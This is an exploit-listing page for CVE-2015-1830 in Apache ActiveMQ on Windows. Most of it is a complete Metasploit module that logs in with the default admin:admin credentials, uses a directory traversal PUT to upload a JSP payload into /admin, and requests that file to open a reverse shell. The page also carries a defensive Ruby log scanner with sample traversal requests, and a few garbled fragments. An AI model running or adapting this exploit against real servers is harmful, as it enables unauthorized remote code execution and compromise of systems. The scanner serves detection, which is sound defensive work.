
Apache ActiveMQ 5.11.1 Directory Traversal / Shell Upload Vulnerability


This Wind


Published by: Metasploit                                              Severity: [Critical]

Description:

This Metasploit module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. The module attempts to upload a JSP payload to the /admin directory through the traversal path /fileserver/..\admin\ using an HTTP PUT request with the default ActiveMQ credentials admin:admin (or other credentials supplied by the user). It then issues an HTTP GET request to /admin/<payload>.jsp on the target to trigger the payload and obtain a shell.

CVE ID: CVE-2015-1830
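From the defender's side, the request sequence described above (an authenticated PUT into /fileserver/ whose path carries a traversal sequence, followed by a GET of the same JSP name under /admin/) is visible in the HTTP access log. The Ruby script below is an added example, not part of the Metasploit module on this page or of the ActiveMQ project: it scans access-log lines for that pattern, correlating each traversal PUT with a later request for the file it placed. The sample log lines, the NCSA-style line layout, and the response codes are constructed for the example; the layout of a real Jetty/ActiveMQ access log is an assumption and the regex may need adjusting.

```ruby
# Added example: detect CVE-2015-1830 style traversal uploads in HTTP access logs.
# Not part of the Metasploit module above. Log layout and sample lines are constructed.

# NCSA common log format (assumed): host ident user [time] "METHOD path PROTO" status size
LOG_RE = /\A(?<host>\S+) \S+ (?<user>\S+) \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) \S+" (?<status>\d{3}) (?<size>\S+)/

# Percent-decode a path without turning '+' into a space (CGI.unescape would).
def pct_decode(path)
  path.gsub(/%([0-9a-fA-F]{2})/) { $1.hex.chr }
end

# True if the raw or decoded path contains ".." followed by a forward or back
# slash: covers ..\, ../, ..%5c, ..%2f and %2e%2e variants after decoding.
def traversal?(path)
  [path, pct_decode(path)].any? { |p| p.match?(%r{\.\.[\\/]}) }
end

# Last path component, treating both slash styles as separators (Windows target).
def basename(path)
  pct_decode(path).split(%r{[\\/]}).last.to_s
end

# Returns an array of alert hashes for suspicious requests in +lines+.
# Unparseable lines are skipped.
def scan_log(lines)
  alerts = []
  uploaded = {} # basename => host that placed it through a traversal PUT
  lines.each do |line|
    m = LOG_RE.match(line) or next
    path = m[:path]
    if m[:method] == 'PUT' && path.start_with?('/fileserver/') && traversal?(path)
      uploaded[basename(path)] = m[:host]
      alerts << { kind: :traversal_put, host: m[:host], user: m[:user],
                  path: path, status: m[:status].to_i }
    elsif m[:method] == 'GET' && pct_decode(path).start_with?('/admin/') &&
          path.downcase.end_with?('.jsp')
      name = basename(path)
      next unless uploaded.key?(name) # only JSPs that arrived via a traversal PUT
      alerts << { kind: :uploaded_jsp_executed, host: m[:host], path: path,
                  uploaded_by: uploaded[name], status: m[:status].to_i }
    end
  end
  alerts
end

# Constructed sample log: addresses, timestamps, file names and status codes are made up.
SAMPLE_LOG = [
  '10.0.0.5 - admin [20/Mar/2020:10:01:00 +0000] "GET /admin/index.jsp HTTP/1.1" 200 5120',
  '10.0.0.9 - admin [20/Mar/2020:10:02:13 +0000] "PUT /fileserver/..\admin\abcdefghij.jsp HTTP/1.1" 204 0',
  '10.0.0.9 - admin [20/Mar/2020:10:02:14 +0000] "GET /admin/abcdefghij.jsp HTTP/1.1" 200 11',
  '10.0.0.7 - - [20/Mar/2020:10:03:00 +0000] "PUT /fileserver/report.txt HTTP/1.1" 204 0',
  '10.0.0.9 - admin [20/Mar/2020:10:04:00 +0000] "PUT /fileserver/..%5cadmin%5cklmnopqrst.jsp HTTP/1.1" 204 0'
]

if __FILE__ == $0
  scan_log(SAMPLE_LOG).each { |a| puts a.inspect }
end
```

The ordinary PUT of report.txt into /fileserver/ produces no alert, while the two traversal uploads and the execution of the first one do. Run on a real log, the script only confirms that the pattern was attempted; the upgrade to 5.11.2 named in the description is the fix.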


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache
        ActiveMQ 5.x before 5.11.2 for Windows.

        The module tries to upload a JSP payload to the /admin directory via the traversal
        path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ
        credentials admin:admin (or other credentials provided by the user). It then issues
        an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the
        payload and obtain a shell.
      },
      'Author'         =>
        [
          'David Jorm',     # Discovery and exploit
          'Erik Wynter'     # @wyntererik - Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2015-1830' ],
          [ 'EDB', '40857' ],
          [ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ]
        ],
      'Privileged'     => false,
      'Platform'       => %w{ win },
      'Targets'        =>
        [
          [ 'Windows Java',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'win'
            }
          ],
        ],
      'DisclosureDate' => '2015-08-19',
      'License'        => MSF_LICENSE,
      'DefaultOptions' => {
        'RPORT' => 8161,
        'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
      },
      'DefaultTarget'  => 0))

    register_options([
      OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
      OptString.new('PATH',      [true, 'Traversal path', '/fileserver/..\\admin\\']),
      OptString.new('USERNAME',  [true, 'Username to authenticate with', 'admin']),
      OptString.new('PASSWORD',  [true, 'Password to authenticate with', 'admin'])
    ])
  end

  def check
    print_status("Running check...")
    testfile = Rex::Text::rand_text_alpha(10)
    testcontent = Rex::Text::rand_text_alpha(10)

    # Upload a harmless JSP that only echoes a random marker through the traversal path
    send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),
      'headers'   => {
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
      },
      'method'    => 'PUT',
      'data'      => "<% out.println(\"#{testcontent}\");%>"
    })

    # If the traversal worked, the file is now served from /admin/ and echoes the marker
    res1 = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, "admin/#{testfile}.jsp"),
      'headers'   => {
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
      },
      'method'    => 'GET'
    })

    if res1 && res1.body.include?(testcontent)
      # Best-effort cleanup of the test file; a short timeout keeps the check fast
      send_request_cgi({
        'uri'       => normalize_uri(target_uri.path, "admin/#{testfile}.jsp"),
        'headers'   => {
          'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
        },
        'method'    => 'DELETE'
      }, 1)
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Uploading payload...")
    testfile = Rex::Text::rand_text_alpha(10)
    # This information is provided to allow for manual execution of the payload in case
    # the upload is successful but the GET request issued by the module fails.
    vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp")

    send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),
      'headers'   => {
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
      },
      'method'    => 'PUT',
      'data'      => payload.encoded
    })

    print_status("Payload sent. Attempting to execute the payload.")
    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, "admin/#{testfile}.jsp"),
      'headers'   => {
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
      },
      'method'    => 'GET'
    })
    if res && res.code == 200
      print_good("Payload executed!")
    else
      fail_with(Failure::PayloadFailed, "Failed to execute the payload")
    end
  end
end
<font></font>
[2020-03-20]